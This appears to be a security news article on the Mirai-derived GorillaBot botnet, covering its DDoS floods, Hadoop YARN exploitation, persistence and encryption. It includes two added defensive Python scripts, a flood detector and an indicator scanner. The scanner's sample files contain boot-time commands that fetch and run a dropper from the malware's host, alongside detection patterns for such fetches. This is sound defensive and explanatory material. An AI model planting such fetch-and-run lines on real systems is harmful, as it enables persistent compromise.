Gorilla, also known as GorillaBot, is a botnet malware family that security researchers have found behind a surge of distributed denial-of-service (DDoS) attacks worldwide. Derived from the leaked Mirai botnet source code, the new threat underlines how urgently IoT security needs to improve.
NSFOCUS, the cybersecurity firm that identified the botnet, reports that Gorilla issued more than 300,000 attack commands between September 4 and September 27, 2024, an average of at least 20,000 commands per day. Targets spanned more than 100 countries and sectors including universities, government websites, telecommunications, banking, gaming and gambling. China, the United States, Canada and Germany were the most heavily hit.
Advanced Attack Strategies
Gorilla supports several DDoS methods: SYN flood, ACK flood, VSE flood, ACK BYPASS flood and UDP flood. Because UDP is connectionless, the bot can stamp arbitrary spoofed source IP addresses on its packets, generating large volumes of traffic that cannot be filtered by source.
The botnet is built for several CPU architectures, including ARM, MIPS, x86_64 and x86, so a single campaign can compromise both IoT devices and cloud hosts. Each bot connects to one of five preconfigured command-and-control (C2) servers to receive attack commands and carry them out.
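To show what the spoofed-source floods described above look like at the network edge, here is an added triage script (not NSFOCUS or GorillaBot code) that runs over constructed NetFlow-style records. The heuristic is this example's own assumption: a flood that spoofs its source addresses shows almost one distinct source per packet, whereas legitimate traffic repeats a few sources many times. Mapping VSE floods to UDP port 27015 is also an assumption; ACK BYPASS floods are not separated from plain ACK floods.

```python
"""Flow-level flood triage for the attack types listed above.

Added example (not NSFOCUS or GorillaBot code). Input is a list of
constructed NetFlow-style records; real data would come from a collector.
Heuristic, an assumption of this example: a flood that spoofs its source
addresses shows almost one distinct source per packet, whereas legitimate
traffic repeats sources many times.
"""
import ipaddress
import random
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Flow:
    ts: float       # seconds
    proto: str      # "tcp" or "udp"
    src: str
    dst: str
    dport: int
    flags: str      # TCP flag letters (S, A, P, ...); "" for UDP
    packets: int


def classify(flow):
    """Map a record onto one of the flood types named in the article.

    Assumption: VSE (Valve Source Engine) floods are UDP to port 27015, the
    default Source engine query port. ACK BYPASS floods are not separated
    from plain ACK floods here. Returns None for traffic that fits no type.
    """
    if flow.proto == "udp":
        return "VSE flood" if flow.dport == 27015 else "UDP flood"
    if flow.flags == "S":
        return "SYN flood"
    if flow.flags == "A":
        return "ACK flood"
    return None


def detect_floods(flows, window=1.0, min_packets=100, min_src_ratio=0.8):
    """Alert on (time window, destination, flood type) buckets whose volume is
    high and whose distinct-source/packet ratio indicates spoofing."""
    buckets = defaultdict(lambda: {"packets": 0, "srcs": set()})
    for f in flows:
        kind = classify(f)
        if kind is None:
            continue
        key = (int(f.ts // window), f.dst, kind)
        buckets[key]["packets"] += f.packets
        buckets[key]["srcs"].add(f.src)

    alerts = []
    for (slot, dst, kind), b in sorted(buckets.items()):
        ratio = len(b["srcs"]) / b["packets"]
        if b["packets"] >= min_packets and ratio >= min_src_ratio:
            alerts.append({
                "window_start": slot * window,
                "dst": dst,
                "kind": kind,
                "packets": b["packets"],
                "distinct_sources": len(b["srcs"]),
            })
    return alerts


def build_sample():
    """Constructed traffic: two spoofed floods plus two legitimate streams."""
    rng = random.Random(7)
    rand_ip = lambda: str(ipaddress.IPv4Address(rng.getrandbits(32)))
    flows = []
    # 300 UDP packets to 203.0.113.10:53, each from a random spoofed source.
    for i in range(300):
        flows.append(Flow(10.0 + i / 300, "udp", rand_ip(), "203.0.113.10", 53, "", 1))
    # 200 bare SYNs to 203.0.113.30:443, again one spoofed source per packet.
    for i in range(200):
        flows.append(Flow(10.0 + i / 200, "tcp", rand_ip(), "203.0.113.30", 443, "S", 1))
    # Legitimate DNS: 5 resolvers, 20 packets each, to 203.0.113.20:53.
    # Same packet count as min_packets, but only 5 sources, so no alert.
    for r in range(5):
        for i in range(20):
            flows.append(Flow(10.0 + i / 20, "udp", f"198.51.100.{r + 1}", "203.0.113.20", 53, "", 1))
    # Legitimate HTTPS data (PSH+ACK) matches no flood type and is ignored.
    for i in range(40):
        flows.append(Flow(10.0 + i / 40, "tcp", "198.51.100.9", "203.0.113.20", 443, "PA", 1))
    return flows


if __name__ == "__main__":
    for a in detect_floods(build_sample()):
        print(a)
```

On the constructed sample the script raises exactly two alerts, one UDP flood against 203.0.113.10 and one SYN flood against 203.0.113.30, while the legitimate DNS stream to 203.0.113.20 stays quiet despite reaching the packet threshold, because its five resolvers give a source ratio of 0.05.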
Exploiting the Apache Hadoop YARN vulnerability
Notably, the malware also carries an exploit for a remote code execution vulnerability in Apache Hadoop YARN RPC that has been widely abused since 2021. This lets Gorilla gain unauthorized access to exposed Hadoop hosts and run arbitrary code on them, extending its reach beyond consumer IoT devices.
Strategies for Persistence
Gorilla uses several persistence mechanisms to keep long-term control of compromised systems. It creates a systemd service file named custom.service in /etc/systemd/system/ so that it runs automatically at boot. It also injects commands to download and run a shell script (lol.sh) from a remote server (pen.gorillafirewall[.]su) into startup and login files including /etc/inittab, /etc/profile and /boot/bootcmd, so the dropper is fetched again even if the service unit is removed.
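The file paths, the download host and the dropper name above are enough for a host check. The following added script (not code from the NSFOCUS report or from the malware) scans those four files for the indicators and also flags any remote wget/curl in a startup file, which is this example's own assumption rather than a reported indicator. The sample file contents are constructed; the exact command lines the bot writes are not given in the article and are assumed here.

```python
"""Host check for the GorillaBot persistence artefacts named above.

Added example, not code from the NSFOCUS report or the malware. It inspects
the four files the article lists for the download host
(pen.gorillafirewall[.]su) and the dropper name (lol.sh). The sample file
contents below are constructed; only the paths, the domain and the script
name come from the article.
"""
import re
from pathlib import Path

PERSISTENCE_FILES = [
    "/etc/systemd/system/custom.service",
    "/etc/inittab",
    "/etc/profile",
    "/boot/bootcmd",
]

IOC_PATTERNS = [
    # The download host, in both its live and defanged spellings.
    ("gorillafirewall host", re.compile(r"pen\.gorillafirewall(\[\.\]|\.)su", re.I)),
    # The dropper script name.
    ("lol.sh dropper", re.compile(r"\blol\.sh\b")),
    # Assumption of this example: any wget/curl of a remote URL from a boot or
    # login file is worth a look even if the domain changes.
    ("remote fetch in startup file", re.compile(r"\b(?:wget|curl)\b.*https?://", re.I)),
]


def scan_text(path, text):
    """Return (path, line number, indicator name, line) for each matching line.
    One hit per line: the most specific indicator listed first wins."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for name, pat in IOC_PATTERNS:
            if pat.search(line):
                hits.append((path, lineno, name, line.strip()))
                break
    return hits


def scan_files(files):
    """files: mapping of path -> contents, so the check runs on a mounted
    image or on the constructed sample as well as on the live host."""
    hits = []
    for path, text in files.items():
        hits.extend(scan_text(path, text))
    return hits


def scan_host(paths=PERSISTENCE_FILES):
    """Read the real files; a missing file is normal and is skipped."""
    files = {}
    for p in paths:
        try:
            files[p] = Path(p).read_text(errors="replace")
        except (FileNotFoundError, PermissionError, IsADirectoryError):
            continue
    return scan_files(files)


# Constructed sample: an infected service unit and inittab, plus a clean profile.
SAMPLE_FILES = {
    "/etc/systemd/system/custom.service": (
        "[Unit]\nDescription=custom\nAfter=network.target\n\n"
        "[Service]\nType=simple\n"
        "ExecStart=/bin/sh -c 'wget http://pen.gorillafirewall.su/lol.sh -O /tmp/lol.sh; sh /tmp/lol.sh'\n"
        "Restart=always\n\n[Install]\nWantedBy=multi-user.target\n"
    ),
    "/etc/inittab": (
        "::sysinit:/etc/init.d/rcS\n"
        "::sysinit:wget -q http://pen.gorillafirewall.su/lol.sh -O- | sh\n"
        "::respawn:/sbin/getty 115200 ttyS0\n"
    ),
    "/etc/profile": "export PATH=/usr/local/bin:/usr/bin:/bin\numask 022\n",
}


if __name__ == "__main__":
    for hit in scan_files(SAMPLE_FILES):
        print(hit)
    for hit in scan_host():   # live host; prints nothing on a clean box
        print("LIVE:", hit)
```

Run as root (or against a copied root filesystem via scan_files) the check reports the infected service unit and the inittab line in the sample and nothing for the clean profile; a hit on the generic fetch rule alone means an unknown remote script is being pulled at boot and should be investigated, not that GorillaBot specifically is present.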
Anti-Detection Techniques
To hide key data, the malware uses encryption routines commonly associated with the Keksec group, a sign of deliberate anti-detection effort. Combined with its range of DDoS methods and persistence mechanisms, this makes Gorilla a serious threat in the evolving IoT security landscape.
Researchers’ Points of View
Interestingly, a security researcher using the handle Fox_threatintel said on X (formerly Twitter) that GorillaBot has been operating for more than a year, contradicting earlier assumptions that it was a newly discovered threat.
The findings underline how important proactive measures are in disrupting botnets and protecting IoT ecosystems. GorillaBot's ability to knock critical infrastructure offline around the world is a sobering reminder of the weaknesses in IoT devices and the urgent need for stronger security.